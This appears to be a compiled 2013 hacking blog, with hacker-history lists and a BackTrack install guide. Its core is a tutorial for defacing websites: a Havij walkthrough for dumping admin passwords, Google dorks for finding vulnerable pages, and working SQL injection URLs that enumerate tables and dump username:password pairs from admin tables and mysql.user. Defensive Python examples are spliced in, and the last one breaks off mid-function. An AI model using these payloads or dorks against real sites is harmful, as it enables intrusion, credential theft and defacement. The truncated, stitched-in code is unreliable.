Saturday, 24 August 2013

DEFACING A WEBSITE WITH HAVIJ TOOL

How to use the Havij tool to hack and deface a website.






As per request, we are posting a hacking tool and how to use it. First, if you haven't downloaded Havij, I strongly recommend you download it before moving on with this tutorial (click the Download button at the end of the tutorial). If you have not read the SQL injection tutorial, I suggest you read that too before moving ahead.
=>NOW TO TODAY'S TUTORIAL
Step 1: Run Havij. Copy and paste the SQL injection vulnerable website into TARGET and click the ANALYZE button.
Step 2: Be patient while Havij gets all the information about the website, such as the database name, server, etc.
Step 3: Now we need to get the tables of the website. Click on Tables, then click on Get Tables, and wait for the database tables to be listed.
After the tables are found, you will see a "users" table. Put a mark on it and click on the "Get Columns" tab, as shown in the figure.
Now to the final stage: click on "Get Data" to get the password and username of the admin.
Now you have the admin usernames and password. Simply take note of only the username.
The password you got is in MD5 format and cannot be used to log in to the website directly. What we need to do is simply click on the MD5 tab in Havij, paste the password into the text field and click on Start.
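The last step works because the site stored an unsalted MD5 of the password. The storage-side fix is sketched below as an added example that is not part of the original post: the record format `scrypt$salt$hash`, the function names and the sample password are assumptions made for the illustration. It verifies legacy MD5 rows once at login and replaces them with a salted scrypt record.

```python
import hashlib
import hmac
import os
import re

# scrypt cost parameters (assumed values for the example; tune for your hardware).
SCRYPT_PARAMS = dict(n=2**14, r=8, p=1, dklen=32, maxmem=64 * 1024 * 1024)
LEGACY_MD5 = re.compile(r"[0-9a-f]{32}")


def legacy_md5(password):
    """What the vulnerable site stores: unsalted MD5, identical for identical passwords."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password, salt=None):
    """Return a salted scrypt record in the (hypothetical) form scrypt$<salt>$<hash>."""
    salt = salt or os.urandom(16)
    digest = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
    return "scrypt$%s$%s" % (salt.hex(), digest.hex())


def verify_and_upgrade(stored, password):
    """Check a login attempt against a stored record.

    Returns (ok, new_record). new_record is a scrypt record when a legacy MD5
    row verified and should be written back in place of the MD5 value.
    """
    if stored.startswith("scrypt$"):
        try:
            _, salt_hex, digest_hex = stored.split("$")
            salt = bytes.fromhex(salt_hex)
        except ValueError:
            return False, None
        candidate = hashlib.scrypt(password.encode(), salt=salt, **SCRYPT_PARAMS)
        return hmac.compare_digest(candidate.hex(), digest_hex), None
    if LEGACY_MD5.fullmatch(stored):
        if hmac.compare_digest(legacy_md5(password), stored):
            return True, hash_password(password)
        return False, None
    return False, None


if __name__ == "__main__":
    # Constructed sample: two accounts that share one password.
    alice, bob = legacy_md5("Summer2013"), legacy_md5("Summer2013")
    print("MD5 rows identical:", alice == bob)
    ok, upgraded = verify_and_upgrade(alice, "Summer2013")
    print("legacy login ok:", ok)
    print("scrypt rows identical:", upgraded == hash_password("Summer2013"))
```

After the upgrade, a dumped `users` table no longer yields values that a hash lookup can reverse, and two accounts with the same password no longer share a stored value.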




Our Partner Site:

Visit    https://www.faadoocoupons.com

Thursday, 22 August 2013

MOST FAMOUS HACKER GROUP EVER




The word “hack” began as a term for an “ingenious solution to a problem.” Then, with the onset of computer programming, it evolved to mean “a feat of programming prowess.” Teenage boys, attracted to the elite power they could wield, immersed themselves in a world of Internet bulletin boards and telephone systems. The lure of the next big challenge, hacker-group rivalries, political activism and personal gain all come into play in this fascinating underground world – in which everything is painted in shades of gray.

10. Chaos Computer Club



The Chaos Computer Club was formed on September 12, 1981 in Berlin. The group gained worldwide notoriety by hacking into the German Bildschirmtext computer network and debiting 134,000 Deutsch Marks from a Hamburg bank. They returned the money the next day, having proven their point: the system’s security was flawed.
Some members of the club were also involved in a cyberespionage case in 1989. They hacked into corporate and government computers in the US and sold the source code to the KGB. The Chaos Computer Club also used hacking to protest French nuclear testing, to publish the fingerprints of Germany’s Minister of the Interior, Wolfgang Schäuble, and to expose a government Trojan horse spyware device.

9. Global kOS



The goal of Global kOS (pronounced “chaos”) was exactly that: to create as much online disorder as possible on a global scale. Consisting of members with handles like AcidAngel, The Assassin and Shadow Hunter, the group was responsible for providing a slew of automated hacker tools to the online community. This meant that so-called “script-kiddies,” who don’t necessarily have any true computer programming abilities, could wreak havoc without much technical knowhow.
Created in 1996 by AcidAngel, “Up Yours!” was a denial of service tool used to bring down the websites of 40 politicians, including that of Rush Limbaugh, as well as those of MTV and the Ku Klux Klan. Other tools developed by Global kOS include the kOS Crack, for cracking passwords, and BattlePong, an IRC flooding utility.

8. The Level Seven Crew



The Level Seven Crew is believed to have taken its name from the seventh level of hell (“the violent”) in Dante’s famous poetic allegory, “The Inferno.”
In 1999 alone, Level Seven illegally infiltrated over 60 computer systems, including those of NASA, The First American National Bank, and Sheraton Hotels. They also broke into the website of the US Embassy in China and defaced it with racist slogans to protest the United States’ accidental bombing of the Chinese Embassy in Belgrade. And they were apparently the first group to hack into a .ma (Moroccan) domain. Most of their exploits tended towards “hacktivism,” a form of online activism, rather than being motivated by personal gain. The group disbanded in 2000.

7. globalHell



The hacker group globalHell has been compared to a gang of thugs; but instead of battling it out on the streets, they took their fight into cyberspace. The group is said to have attacked and destroyed data on 115 websites, caused millions of dollars in damages, and trafficked stolen information.
Ironically, globalHell was co-founded by a known Houston street gang member named Patrick Gregory, who turned to computers as a “way out” of gang life. However, he ended up transferring his gang-related activity to the web, where he helped coordinate a 60-member syndicate.
globalHell not only carried out an online version of extortion; they also went as far as attacking and defacing the United States Army’s website, vandalizing it with the message, “globalHell will not die.” Twenty-year-old Wisconsin-based co-founder Chad Davis was arrested in 1999, sentenced to six months in prison, and ordered to pay $8,054. In an amusing twist, he has since gone on to become an independent security consultant.

6. TeaMp0isoN



A 16-year-old hacker who goes by the online name TriCk started TeaMp0isoN in 2010. The group was responsible for hacking into Facebook, NATO, and the English Defense League. They also hacked into an email account and retrieved personal data about former British Prime Minister Tony Blair. And when Research In Motion, the company responsible for developing the BlackBerry smartphone, planned to help police during the 2011 England riots, TeaMp0isoN defaced the official BlackBerry blog, writing, “We are all for the rioters that are engaging in attacks on the police and government.”
The group also hacked the British Anti-terrorism Hotline to protest the extradition of suspects to the US. The group claims to be politically motivated, aiming to expose international governments hiding their wrongdoings.

5. Network Crack Program Hacker Group



The Network Crack Program Hacker Group (NCPH) was formed in 1994, in Zigong, China. In 2006, the group was thought to consist of around 10 members, with four key players at the helm. It’s actually said that the group’s leader, Wicked Rose (real name Tan Dailin), works for the Chinese Army. The current size of the group is unknown.
Initially, NCPH got their kicks hacking into a large proportion of Chinese hacker association websites. Yet their attacks soon evolved. In 2006, Wicked Rose’s GinWui rootkit was employed in attacks on the US Department of Defense. And later that year, Internet security consultancy iDefense linked the group with a number of notable online attacks.
The group is also well known for the remote-network-control and network-infiltration programs they have available for download. What’s more, according to Wicked Rose, NCPH is paid for their work by a mysterious sponsor. It is believed that the group’s benefactor is the People’s Liberation Army.

4. LulzSec



One of LulzSec’s mottos is “Laughing at your security since 2011.” The group enjoys exposing security weaknesses and flaws, and their targets have included Fox.com, an X-Factor database (they released the contact information for 73,000 contestants), Sony, the CIA, and the FBI. They are said to have caused billions of dollars in damages.
In March 2012, top members of LulzSec were arrested, after their leader, code-named Sabu, turned them over to the FBI to face charges of conspiracy. A mere three months later, the group reemerged, hacking into a dating website for singles in the military. They dumped 170,937 email accounts, claiming that Lulzsec had been “reborn.”

3. Masters of Deception



New York hacker group Masters of Deception was formed in 1989, as a bitter rival to Texas-based hackers Legion of Doom. The groups’ one-upmanship soon evolved into all-out war, with racial and class overtones adding extra tension.
To prove their hacking prowess, Masters of Deception members allegedly carried out what has been dubbed “one of the most extensive thefts of computer information ever reported.” According to reports, they broke into tough-to-crack servers and stole confidential information, which they later sold. Secret Service members carried out major raids and succeeded in indicting five top hackers in the group. They were charged with “computer tampering, computer and wire fraud, illegal wiretapping, and conspiracy.” All five pleaded guilty.

2. Milw0rm



On June 3, 1998, a group of hacktivists known as Milw0rm targeted the computers of India’s primary nuclear facility, the Bhabha Atomic Research Center. The group operated from the UK, the US, Russia and New Zealand, and they broke through the center’s firewalls. They lifted five megabytes of classified files about India’s last five nuclear tests, erased data from two servers, and posted anti-nuclear messages on the center’s website. The implications of the hack were huge and caused major upheaval as other institutions heightened their security.
One month later, Milw0rm hacked into a web hosting company named EasySpace, and within an hour they had posted their anti-nuclear message on 300 websites, including those of the FIFA World Cup, Drew Barrymore, Wimbledon, and the Saudi Royal Family.

1. Anonymous



Anonymous is a huge, amorphous group of hackers that has gained considerable momentum over the past couple of years. On January 19, 2012, more than 5,635 people (some unknowingly) joined a distributed denial-of-service attack against supporters of the Stop Online Piracy Act. The sites they disabled included the FBI website, as well as those of the Justice Department, the Motion Picture Association of America, and Universal Music Group.
Other Anonymous activities include protesting UK extradition policies, tracking down cyber-criminals (such as “Internet predator” Chris Forcand), and taking down child porn sites hidden in the depths of the worldwide web. Anonymous has threatened Mexican drug cartel group “Los Zetas,” attacked the Pentagon, threatened to take down Facebook, and waged war on Scientology. The group’s motto is “We are Anonymous. We are Legion. We do not forgive. We do not forget. Expect us.”




INSTALLING BACKTRACK 5

Installing BackTrack

In the last post I showed you how to install VirtualBox and then set up the environment
for BackTrack. Today I will show you how to install BackTrack on a virtual machine.

Installing BackTrack on the virtual disk image

1.  Open the VirtualBox Manager and select the Let's_Hack guest machine on the left of the
     screen. Click on the large Start button.
2.  Your machine will now boot up. As we have not yet selected an image to boot the
     system with, we will need to select one using the menu options that appear
     prior to the initial system initialization.
3.  The First Run Wizard will only appear when the virtual machine is started. It allows you to choose
     the ISO you wish to boot from.
4.  It is also possible to add the installation media in the Virtual Machine Settings, in the Storage
     category.
5.  Click on Next to continue.
7.  On the Select Installation Media screen you will need to set the location of the BackTrack ISO
     file which you have downloaded. Click on Next when ready.
8.  Click on Start.
9.  Type startx at the root@root:~# prompt.
10. Now that we have the BackTrack ISO up and running on our virtual machine, click on
     the Install BackTrack icon to begin the short installation process.
11. Select your preferred language and click on Forward.
12. Select your location, date and time. Click on Forward to continue.
13. Select your preferred keyboard layout and click on Forward.
14. Choose the "Erase and use the entire disk" radio button and click on Forward.
15. Click on Install to initialize the changes. This may take a few minutes to complete.
16. When the install has finished you will be required to reboot the system. Click on the
      Restart Now button and then unload the ISO. You will need to choose Devices >
      CD/DVD Devices > BackTrack ISO file name. This will eject the ISO image before
      the system reboots. Press Enter to reboot.











HACKERS OF ALL TIME


Top 10 Notorious Black Hat Hackers

Chandler Grant
To accompany the technological advancements of the computer world and the constantly changing definition of a hacker, we thought it was time to look back at ten of the most notorious black hat hackers and the legendary hacks that earned them such a title. First, it should be known that a black hat hacker is computing slang for a person who engages in illegal or malicious hacking. A white hat hacker is a computer hacker who intends to improve internet security. It is noteworthy that many white hat hackers, such as Steve Jobs of Apple, Mark Zuckerberg of Facebook, and even many hackers listed below, were once black hat hackers.

10. Kevin Poulsen (a.k.a. Dark Dante)
The notorious ’80s black hat hacker, Kevin Poulsen, gained recognition for his hacking of the telephone lines for LA radio station KIIS-FM, securing himself a place as the 102nd caller and winning a brand new Porsche 944, among other prizes. Law enforcement dubbed Poulsen the “Hannibal Lecter of computer crime.” Poulsen went underground as a fugitive when the FBI began its search for him, but in 1991, he was finally captured.
He pleaded guilty to seven counts of mail, wire and computer fraud, money laundering, obstruction of justice, and for obtaining information on covert businesses run by the FBI. Kevin Poulsen was sentenced to 51 months in prison (4 years and 3 months), which was the longest sentence ever given for hacking at the time. However, since serving time, Poulsen has worked as a journalist and is now a senior editor for Wired News. Poulsen’s most note-worthy article details his work on identifying 744 sex offenders with MySpace profiles.

9. Albert Gonzalez
Cyber-criminal Albert Gonzalez has been accused of masterminding the biggest ATM and credit card theft in history; from 2005 to 2007, he and his cybergroup had allegedly sold more than 170 million card and ATM numbers. Gonzalez’s team used SQL injection techniques to create malware backdoors on several corporate systems in order to launch packet-sniffing (specifically, ARP Spoofing) attacks, allowing him to steal computer data from internal corporate networks. When he was arrested, authorities seized $1.6 million in cash including $1.1 million found in plastic bags placed in a three-foot drum which had been buried in his parents’ backyard. In 2010, Gonzalez was sentenced to 20 years in federal prison.

8. Vladimir Levin
It’s almost like the opening of a James Bond movie: in 1994, while working from his laptop from his Russian apartment in St. Petersburg, Vladimir Levin transferred $10 million from the accounts of Citibank clients to his own accounts around the world.
However, Levin’s career as a hacker was only short lived, with a capture, imprisonment and recovery of all but $400,000 of the original $10 million. During Levin’s 1997 trial in the United States, he was said to have coordinated the first ever internet bank raid. The truth is Levin’s ability to transfer Citibank client funds to his own accounts was possible through stolen account numbers and PINs. Levin’s scam was a simple interception of clients’ calls while recording the punched in account numbers.

7. Robert Tappan Morris
On November 2, 1988, Robert Morris released a worm that took down one-tenth of the Internet, crippling 6,000 plus computer systems. It didn’t take long for the police to track him down. Due in part to the need for social acceptance that seems to be common amongst many young hackers, Morris made the mistake of chatting about his worm for months before its release on the Internet. Morris claimed it was just a stunt, and added that he truly regretted causing $15 million worth of damage: the estimated amount of carnage his worm left behind.
Morris was one of the first to be tried and convicted under the Computer Fraud and Abuse Act but only had community service and a fine as his penalty. The defense for such a light sentence was that Morris’ worm didn’t destroy the actual contents of affected computers. Morris now works in the department of Electrical Engineering and Computer Science at Massachusetts Institute of Technology (MIT).

6. Michael Calce (a.k.a. MafiaBoy)
In February of 2000, Michael Calce launched a series of widely known denial-of-service attacks against large commercial websites, including Yahoo!, Amazon.com, Dell, eBay, and CNN. He hacked Yahoo! when it was still the web’s leading search engine and caused it to shutdown for about an hour. Like many hackers, Calce exploited websites primarily for pride and establishing dominance for himself and his cybergroup, TNT. In 2001, the Montreal Youth Court sentenced Calce to eight months of open custody, one year of probation, restricted use of the Internet, and a minimal fine.

5. David Smith
Smith’s fame is due to being the author of the infamous e-mail virus, Melissa. Smith claims that the Melissa virus was never intended to cause harm, but its simple means of propagation (each infected computer sent out multiple infected emails) overloaded computer systems and servers around the world. Smith’s virus takes an unusual turn in that it was originally hidden in a file that contained passwords to 80 well-known pornography websites. The name Melissa was derived from a lap dancer Smith met while on a trip in Florida. Even though over 60,000 email viruses have been discovered, Smith is the only person to go to federal prison in the United States for sending one.

4. Adrian Lamo
Nicknamed “the homeless hacker,” Adrian Lamo used coffee shops, libraries and internet cafés as his locations for hacking. Apart from being the homeless hacker, Lamo is widely known for breaking into a series of high-profile computer networks, which include The New York Times, Microsoft, Yahoo!, and MCI WorldCom. In 2002, he added his name to The New York Times’ internal database of expert sources and utilized a LexisNexis account to conduct research on high-profile subjects. The Times filed a complaint, and a warrant for Lamo’s arrest was issued, followed by a 15-month investigation by federal prosecutors in New York.
After several days in hiding, he finally surrendered to the US Marshals, and then to the FBI. Lamo was ordered to pay approximately $65,000 in damages and was sentenced to six months house arrest at his parents’ home, with an additional two years of probation. In June 2010, Lamo disclosed the name of Bradley Manning to U.S. Army authorities as the source of the July 12, 2007 Baghdad airstrike video leak to Wikileaks. Lamo is presently working as a threat analyst and donates his time and skills to a Sacramento-based nonprofit organization.

3. George Hotz
The name of the acclaimed jailbreak artist, George Hotz, will forever be associated with the April 2011 PlayStation breach. Being one of the first hackers ever to jailbreak the Sony PlayStation 3, Hotz found himself in the midst of a very relentless, public and messy court battle with Sony – perhaps worsened by Hotz’s public release of his jailbreaking methods. In a stated retaliation for Sony’s breach of the unstated rule of jailbreaking – never prosecute – the hacker group Anonymous attacked Sony in what would be dubbed the most costly security break of all time to date.
Hackers broke into the PlayStation Network and stole personal information of some 77 million users. However, Hotz denied any responsibility for the attack, and added “Running homebrew and exploring security on your devices is cool; hacking into someone else’s server and stealing databases of user info. is not cool.”

2. Jonathan James (a.k.a. c0mrade)
Jonathan James, 16-year-old black hat hacker, became the first juvenile imprisoned for cybercrime in the United States. James gained his notoriety by implementing a series of successful intrusions into various systems. At an amazingly young age of 15, James specialized in hacking high-profile government systems such as NASA and the Department of Defense. He was reported to have stolen software worth over $1.7 million. He also hacked into the Defense Threat Reduction Agency and intercepted over 3,000 highly secretive messages passing to and from the DTRA employees, while collecting many usernames and passwords.
On May 18, 2008, at the age of 25, James committed suicide using a gun. The words in his suicide note provide some insight into this obviously brilliant but troubled youth who thought he would be a scapegoat and blamed for cyber crimes he did not commit: “I have no faith in the ‘justice’ system. Perhaps my actions today, and this letter, will send a stronger message to the public. Either way, I have lost control over this situation, and this is my only way to regain control.”

1. Gary McKinnon
In 2002, an exceptionally odd message appeared on a US Army computer screen: “Your security system is crap,” it read. “I am Solo. I will continue to disrupt at the highest levels.” It was later identified as the work of Scottish systems administrator, Gary McKinnon.
McKinnon suffers from Asperger’s syndrome, which is the least severe form of autism. The symptoms of Asperger’s syndrome certainly match Gary’s actions: that is, highly intelligent with an exceptional understanding of complex systems. Though sufferers often have difficulty reading social cues and acknowledging the impact of their often-obsessive behavior, they tend to be geniuses in one particular subject. For Gary, it was computers.
Gary has been accused of executing the largest ever hack of United States government computer networks, including Army, Air Force, Navy and NASA systems. The court had recommended that McKinnon be extradited to the United States to face charges of illegally accessing 97 computers, causing a total of $700,000 in damage. Even more interesting are McKinnon’s motives for the large-scale hackings, which he claims were in search of information on UFOs. He believed the US government was hiding such information in its military computers.

+ Kevin Mitnick
Kevin David Mitnick (born on August 6, 1963) is an American computer security consultant, author, and hacker. In the late 20th century, he was convicted of various computer- and communications-related crimes. At the time of his arrest, he was the most-wanted computer criminal in the United States. Mitnick gained unauthorized access to his first computer network in 1979, at 16, when a friend gave him the phone number for the Ark, the computer system Digital Equipment Corporation (DEC) used for developing their RSTS/E operating system software. He broke into DEC’s computer network and copied their software, a crime he was charged with and convicted of in 1988.
According to the U.S. Department of Justice, Mitnick gained unauthorized access to dozens of computer networks while he was a fugitive. He used cloned cellular phones to hide his location and, among other things, copied valuable proprietary software from some of the country’s largest cellular telephone and computer companies. Mitnick also intercepted and stole computer passwords, altered computer networks, and broke into and read private e-mail.
Due to his fame he is included as a bonus entry here.






HOW TO DEFACE A WEBSITE USING SQL AND PHP SCRIPTING

Note: I and thesspyhunter.blogspot.in are not responsible for any misuse of these tutorials. These are just for educational purposes, so don't misuse them!

Today's discussion is on "How to Deface Websites using SQL injection and PHP shell code scripting". Today I will show you the 100% working method for hacking websites and then defacing them.


Hacking class 14 - How to Deface Websites using SQL and Php scripting


FIRST OF ALL, YOU SHOULD KNOW WHAT DEFACEMENT IS
Defacing a website simply means that we replace the index.html file of a site with our own file. All the users that open the site will then see our page (i.e. the one uploaded by us).
For defacing a website, the three things that you need most are:
1. SQL injection (for analyzing website loopholes)
2. Admin password
3. Shell script (for getting admin controls)


Now let's start the tutorial:
First of all, I would like to say that I have taken some parts of the SQL injection tutorial from my previous posts and from the site http://www.milw0rm.com/. Most of it is written by me, so if you have any doubts I will clear them.

1. Finding the Target and the Admin Password
First of all we must find our target website. I have collected a lot of dorks, i.e. search patterns that point to potentially vulnerable pages of websites. Some Google searches can be used to find vulnerable websites. Below are examples of some queries.
Examples: open Google and copy and paste these queries:
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=


Here are some More Queries (use them without quotation marks)..

Now The Admin password Hacking procedure starts:


You can also refer to my previous post of hacking websites:


Hacking websites : How to hack websites By using SQL Injection




1). Check for vulnerability


Let's say that we have some site like this


http://www.site.com/news.php?id=5


Now to test if it is vulnerable, we add a ' (quote) to the end of the URL,


and that would be http://www.site.com/news.php?id=5'


so if we get some error like
"You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc..."
or something similar that means the Site is vulnerable to SQL injection.
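Why the stray quote produces that error, and what the fixed handler looks like, as an added example that is not part of the original post. It uses Python's sqlite3 in place of PHP and MySQL so that it runs offline; the tables, rows and function names are constructed for the illustration, and the third input is one of the UNION strings this tutorial uses further down.

```python
import re
import sqlite3


def make_db():
    """Constructed in-memory database: a public news table and an admin table."""
    db = sqlite3.connect(":memory:")
    db.executescript(
        """
        CREATE TABLE news  (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news  VALUES (5, 'Launch day', 'We are live.');
        INSERT INTO admin VALUES (1, 'superadmin', 'constructed-hash');
        """
    )
    return db


def news_vulnerable(db, raw_id):
    """The flawed pattern: request text is concatenated into the SQL string
    and the database error text is echoed back to the client."""
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    try:
        return 200, db.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return 500, "SQL error: %s" % exc


def news_hardened(db, raw_id):
    """Validate the type, bind the value, and never return database error text."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return 400, "invalid id"
    try:
        rows = db.execute(
            "SELECT id, title, body FROM news WHERE id = ?", (int(raw_id),)
        ).fetchall()
    except sqlite3.Error:
        return 500, "internal error"  # details belong in the server log only
    return (200, rows) if rows else (404, "not found")


# Inputs taken from the tutorial's own request strings.
PROBES = ["5", "5'", "5 union all select 1,username,3 from admin"]


def compare(db):
    """Run each probe through both handlers and return the paired results."""
    return [(p, news_vulnerable(db, p), news_hardened(db, p)) for p in PROBES]


if __name__ == "__main__":
    for probe, weak, strong in compare(make_db()):
        print("%-45r vulnerable=%r hardened=%r" % (probe, weak, strong))
```

In the vulnerable handler the quote reaches the SQL parser and the parser's complaint reaches the browser; in the hardened one the same input never becomes part of the statement and the client sees only a generic 400.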


2). Find the number of columns

To find the number of columns we use the ORDER BY statement (it tells the database how to order the result). How do we use it? We just keep incrementing the number until we get an error.
http://www.site.com/news.php?id=5 order by 1/* <-- no error
http://www.site.com/news.php?id=5 order by 2/* <-- no error
http://www.site.com/news.php?id=5 order by 3/* <-- no error
http://www.site.com/news.php?id=5 order by 4/* <-- error (we get a message like "Unknown column '4' in 'order clause'" or something like that)

That means that it has 3 columns, because we got an error on 4.




3). Check for UNION function
With UNION we can select more data in one SQL statement.

So we have
http://www.site.com/news.php?id=5 union all select 1,2,3/* (we already found in section 2 that the number of columns is 3)

If we see some numbers on screen, i.e. 1 or 2 or 3, then the UNION works.
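
Steps 1 to 3 work for one reason: a page like news.php pastes the id parameter straight into its SQL text. The added example below (not part of the original post) shows that pattern next to the fix, using Python's sqlite3 with a constructed in-memory database as a stand-in for the PHP/MySQL site; the function and table names are assumptions.

```python
import sqlite3

def make_db():
    """Constructed sample data standing in for the site's MySQL database."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id INTEGER PRIMARY KEY, title TEXT, body TEXT);
        CREATE TABLE admin (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO news VALUES (5, 'Launch', 'Site is live');
        INSERT INTO admin VALUES (1, 'admin', 'constructed-hash-value');
    """)
    return conn

def get_news_vulnerable(conn, raw_id):
    # The request parameter becomes part of the SQL text, so the database
    # parses whatever the client sent as SQL. A stray quote is a syntax
    # error; a UNION appends rows from any table the account can read.
    sql = "SELECT id, title, body FROM news WHERE id = " + raw_id
    return conn.execute(sql).fetchall()

def get_news_safe(conn, raw_id):
    # Defence 1: id is numeric by design, so refuse anything else up front.
    if not (raw_id.isascii() and raw_id.isdigit() and len(raw_id) <= 18):
        return []
    # Defence 2: bind the value. The statement text is fixed and the
    # parameter is only ever treated as data, never as SQL.
    sql = "SELECT id, title, body FROM news WHERE id = ?"
    return conn.execute(sql, (int(raw_id),)).fetchall()

def handle_request(conn, raw_id, lookup):
    # Defence 3: never echo database errors to the client. The quote test
    # in step 1 relies on the error text reaching the browser.
    try:
        return 200, lookup(conn, raw_id)
    except sqlite3.Error:
        return 500, "Internal error"
```

With the bound parameter, the quote and the UNION input from the steps above return no rows and raise no database error.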


4). Check for MySQL version
http://www.site.com/news.php?id=5 union all select 1,2,3/*
NOTE: if /* is not working or you get some error, then try --
It's a comment and it's important for our query to work properly.

Let's say that we have number 2 on the screen. Now, to check for the version,
we replace the number 2 with @@version or version() and get something like 4.1.33-log or 5.0.45 or similar.

it should look like this 
http://www.site.com/news.php?id=5 union all select 1,@@version,3/*

If you get an error "union + illegal mix of collations (IMPLICIT + COERCIBLE) ..."

I didn't see any paper covering this problem, so I must write it.


What we need is the convert() function

i.e.
http://www.site.com/news.php?id=5 union all select 1,convert(@@version using latin1),3/*

or with hex() and unhex()

i.e.
http://www.site.com/news.php?id=5 union all select 1,unhex(hex(@@version)),3/*

and you will get MySQL version .



5). Getting table and column name

Well, if the MySQL version is < 5 (i.e. 4.1.33, 4.1.12...), we must guess the table and column names in most cases. (Later I will describe MySQL > 5.)

common table names are: user/s, admin/s, member/s ...

common column names are: username, user, usr, user_name, password, pass, passwd, pwd etc...

i.e would be
http://www.site.com/news.php?id=5 union all select 1,2,3 from admin/* (we see number 2 on the screen like before, and that's good )

We know that table admin exists...

Now to check column names.
http://www.site.com/news.php?id=5 union all select 1,username,3 from admin/* (if you get an error, then try the other column name)

we get username displayed on screen, example would be admin, or superadmin etc...

now to check if column password exists
http://www.site.com/news.php?id=5 union all select 1,password,3 from admin/* (if you get an error, then try the other column name)

We see the password on the screen as a hash or in plain text, depending on how the database is set up

i.e. md5 hash, mysql hash, sha1...

Now we must complete the query to look nice


For that we can use concat() function (it joins strings)

i.e
http://www.site.com/news.php?id=5 union all select 1,concat(username,0x3a,password),3 from admin/*
Note that I put 0x3a; it is the hex value for : (so 0x3a is the hex value for a colon)

(there is another way for that, char(58), the ASCII value for : )
http://www.site.com/news.php?id=5 union all select 1,concat(username,char(58),password),3 from admin/*
Now we get username:password displayed on screen, i.e. admin:admin or admin:somehash

When you have this, you can log in as admin or some superuser.


If you can't guess the right table name, you can always try mysql.user (default)

It has user and password columns, so an example would be
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,password),3 from mysql.user/*

6). MySQL 5

Like I said before, I'm going to explain how to get table and column names
in MySQL > 5.

For this we need information_schema. It holds all tables and columns in database.

to get tables we use table_name and information_schema.tables.

i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables/*

Here we replace our number 2 with table_name to get the first table from information_schema.tables
displayed on the screen. Now we must add LIMIT to the end of the query to list out all tables.

i.e.
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 0,1/*
Note that I put 0,1 (get 1 result starting from the 0th)

now to view the second table, we change limit 0,1 to limit 1,1

i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 1,1/*
the second table is displayed.

for third table we put limit 2,1

i.e
http://www.site.com/news.php?id=5 union all select 1,table_name,3 from information_schema.tables limit 2,1/*

Keep incrementing until you get something useful like db_admin, poll_user, auth, auth_user etc...


To get the column names the method is the same.

here we use column_name and information_schema.columns

the method is same as above so example would be
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 0,1/*
The first column is displayed.

The second one (we change limit 0,1 to limit 1,1)

ie.
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns limit 1,1/*

The second column is displayed, so keep incrementing until you get something like

username,user,login, password, pass, passwd etc... 


If you wanna display column names for specific table use this query. (where clause)

Let's say that we found table users.

i.e
http://www.site.com/news.php?id=5 union all select 1,column_name,3 from information_schema.columns where table_name='users'/*
Now the column names in table users are displayed. Just by using LIMIT we can list all columns in table users.

Note that this won't work if magic quotes is ON.

Let's say that we found columns user, pass and email.

Now to complete the query and put them all together.


For that we use concat(); I described it earlier.

i.e.
http://www.site.com/news.php?id=5 union all select 1,concat(user,0x3a,pass,0x3a,email),3 from users/*

What we get here is user:pass:email from table users.

Example: admin:hash:whatever@blabla.com
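
Every request in steps 2 to 6 carries recognisable SQL in the query string, so the whole sequence shows up in the web server's access log. The added example below (not part of the original post) scans log lines for those patterns; the log lines, rule names and IP addresses are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import unquote_plus

# Constructed access-log lines (Apache combined format, documentation IPs).
SAMPLE_LOG = """\
203.0.113.7 - - [24/Aug/2013:10:01:02 +0000] "GET /news.php?id=5' HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Aug/2013:10:01:09 +0000] "GET /news.php?id=5+order+by+4/* HTTP/1.1" 200 498 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Aug/2013:10:01:30 +0000] "GET /news.php?id=5%20UNION%20ALL%20SELECT%201,@@version,3/* HTTP/1.1" 200 530 "-" "Mozilla/5.0"
203.0.113.7 - - [24/Aug/2013:10:02:11 +0000] "GET /news.php?id=5+union+all+select+1,table_name,3+from+information_schema.tables+limit+2,1/* HTTP/1.1" 200 541 "-" "Mozilla/5.0"
198.51.100.20 - - [24/Aug/2013:10:02:40 +0000] "GET /news.php?id=5 HTTP/1.1" 200 2048 "-" "Mozilla/5.0"
198.51.100.20 - - [24/Aug/2013:10:03:05 +0000] "GET /search.php?q=union+station+hotels HTTP/1.1" 200 1900 "-" "Mozilla/5.0"
"""

# One rule per step of the tutorial, matched against the decoded query string.
RULES = {
    "quote_probe": re.compile(r"=\d+'\s*$"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+"),
    "union_select": re.compile(r"\bunion\s+(all\s+)?select\b"),
    "version_probe": re.compile(r"@@version|\bversion\s*\("),
    "schema_enum": re.compile(r"\binformation_schema\.(tables|columns)\b|\bmysql\.user\b"),
    "concat_dump": re.compile(r"\bconcat\s*\(.*(0x3a|char\s*\(\s*58\s*\))"),
}
LINE = re.compile(r'^(\S+) .*? "(?:GET|POST) (\S+) HTTP')

def scan(log_text):
    """Return {client_ip: sorted list of rule names that matched}."""
    hits = defaultdict(set)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or "?" not in m.group(2):
            continue
        ip, target = m.groups()
        # Decode %xx and '+', then fold case and whitespace, so encoded and
        # mixed-case forms of the same request match the same rule.
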